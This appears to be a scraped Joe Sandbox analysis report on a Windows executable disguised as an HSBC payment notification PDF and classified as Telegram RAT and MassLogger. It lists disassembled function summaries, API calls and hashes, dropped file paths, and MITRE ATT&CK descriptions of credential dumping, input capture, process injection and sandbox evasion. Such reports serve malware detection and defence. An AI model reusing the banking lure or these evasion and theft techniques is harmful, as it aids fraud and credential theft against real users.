Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A

Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255

Strings

<local>, xrefs: 0047221D

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9

Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_wcscat.LIBCMT ref: 00444CB7

Strings

SL, xrefs: 004109AE

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: SL
API String ID: 257928180-181245872
Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D

Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73

Strings

ListBox, xrefs: 00458E3D
ComboBox, xrefs: 00458E12

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655

Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B

Strings

ListBox, xrefs: 00458D35
ComboBox, xrefs: 00458D0A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A

Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE

Strings

ListBox, xrefs: 00458DBA
ComboBox, xrefs: 00458D8F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A

Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045C534

Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C

VariantClear.OLEAUT32(?), ref: 0045C556

Strings

d}K, xrefs: 0045C517

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}K
API String ID: 2932060187-3405784397
Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54

Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00464F46
_wcscmp.LIBCMT ref: 00464F58

Strings

#32770, xrefs: 00464F52

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Windows Analysis Report
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

